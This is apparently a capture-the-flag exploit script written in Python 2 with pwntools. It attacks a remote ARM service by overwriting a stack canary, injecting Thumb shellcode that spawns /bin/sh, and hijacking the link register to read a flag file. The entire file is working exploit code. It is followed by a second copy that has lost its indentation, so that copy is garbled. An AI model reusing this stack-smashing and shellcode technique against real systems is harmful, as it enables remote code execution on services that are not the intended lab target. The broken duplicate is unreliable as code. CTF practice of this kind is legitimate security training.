0xb0bb/baby6.py

## baby6.py
#!/usr/bin/env python2
from pwn import *
import sys

# context(terminal=['tmux', 'splitw', '-h'])  # horizontal split window
# context(terminal=['tmux', 'new-window'])    # open new window

def fail(msg):
    log.info("Exploit failed: {}".format(msg))
    exit(1)

def success(msg):
    log.success("{}".format(msg))
    exit(1337)

def main():

    INTRO = False
    HOST, PORT = sys.argv[1].split(':')

    try:

        for z in range(20):

            io = remote(HOST, PORT)

            # step 0: show sexy banner
            banner = io.recvuntil(': ')[:-9]
            if INTRO is False:
                print banner
                INTRO = True

            # step 1: overwrite the canary with a predictable value
            io.sendline('1'+'\x00'*1023+p32(0x01))

            # step 2: fill up the stack buffer
            for i in range(15):
                io.recvuntil(': ')
                io.sendline('1')

            # step 3: now overwrite the stack copy of the canary at the same time putting shellcode in .data
            #         binary is NX but everyone knows that QEMU does not respect NX, PIE or ASLR for QEMU system
            #         because of limitations with the quick emulation model.
            pay  = '1'+'\x00'*15
            pay += '\x01\x30\x8f\xe2'  # add  r3, pc, #1      ; 0x1
            pay += '\x13\xff\x2f\xe1'  # bx   r3
            pay += '\x78\x46'          # mov  r0, pc
            pay += '\x0c\x30'          # adds r0, #12
            pay += '\xc0\x46'          # mov  r8, r8          ; nop
            pay += '\x01\x90'          # str  r0, [sp, #4]
            pay += '\x49\x1a'          # subs r1, r1, r1
            pay += '\x92\x1a'          # subs r2, r2, r2
            pay += '\x0b\x27'          # movs r7, #11
            pay += '\x01\xdf'          # svc   1
            pay += '/bin/sh\x00'

            io.recvuntil(': ')
            io.sendline(pay)

            # step 4: overflow the link register to take control over pc
            io.recvuntil(': ')
            io.sendline(str(0x11300))

            io.recvuntil(': ')
            io.sendline(str(0x11300))

            # step 5: trigger
            io.recvuntil(': ')
            io.sendline('0')
            io.recvline()

            # step 10: collect the flag
            io.sendline('cat ./flag')
            flag = io.recvline().strip()

            return flag
    except:
        io.close()

    return None

if __name__== '__main__':

    if len(sys.argv) < 2:
        fail('No target')

    flag = main()
    if flag.startswith("sctf{"):
        success(flag)

    fail("")
	#!/usr/bin/env python2
	from pwn import *
	import sys

	# context(terminal=['tmux', 'splitw', '-h']) # horizontal split window
	# context(terminal=['tmux', 'new-window']) # open new window

	def fail(msg):
	log.info("Exploit failed: {}".format(msg))
	exit(1)

	def success(msg):
	log.success("{}".format(msg))
	exit(1337)

	def main():

	INTRO = False
	HOST, PORT = sys.argv[1].split(':')

	try:

	for z in range(20):

	io = remote(HOST, PORT)

	# step 0: show sexy banner
	banner = io.recvuntil(': ')[:-9]
	if INTRO is False:
	print banner
	INTRO = True

	# step 1: overwrite the canary with a predictable value
	io.sendline('1'+'\x00'*1023+p32(0x01))

	# step 2: fill up the stack buffer
	for i in range(15):
	io.recvuntil(': ')
	io.sendline('1')

	# step 3: now overwrite the stack copy of the canary at the same time putting shellcode in .data
	# binary is NX but everyone knows that QEMU does not respect NX, PIE or ASLR for QEMU system
	# because of limitations with the quick emulation model.
	pay = '1'+'\x00'*15
	pay += '\x01\x30\x8f\xe2' # add r3, pc, #1 ; 0x1
	pay += '\x13\xff\x2f\xe1' # bx r3
	pay += '\x78\x46' # mov r0, pc
	pay += '\x0c\x30' # adds r0, #12
	pay += '\xc0\x46' # mov r8, r8 ; nop
	pay += '\x01\x90' # str r0, [sp, #4]
	pay += '\x49\x1a' # subs r1, r1, r1
	pay += '\x92\x1a' # subs r2, r2, r2
	pay += '\x0b\x27' # movs r7, #11
	pay += '\x01\xdf' # svc 1
	pay += '/bin/sh\x00'

	io.recvuntil(': ')
	io.sendline(pay)

	# step 4: overflow the link register to take control over pc
	io.recvuntil(': ')
	io.sendline(str(0x11300))

	io.recvuntil(': ')
	io.sendline(str(0x11300))

	# step 5: trigger
	io.recvuntil(': ')
	io.sendline('0')
	io.recvline()

	# step 10: collect the flag
	io.sendline('cat ./flag')
	flag = io.recvline().strip()

	return flag
	except:
	io.close()

	return None

	if __name__== '__main__':

	if len(sys.argv) < 2:
	fail('No target')

	flag = main()
	if flag.startswith("sctf{"):
	success(flag)

	fail("")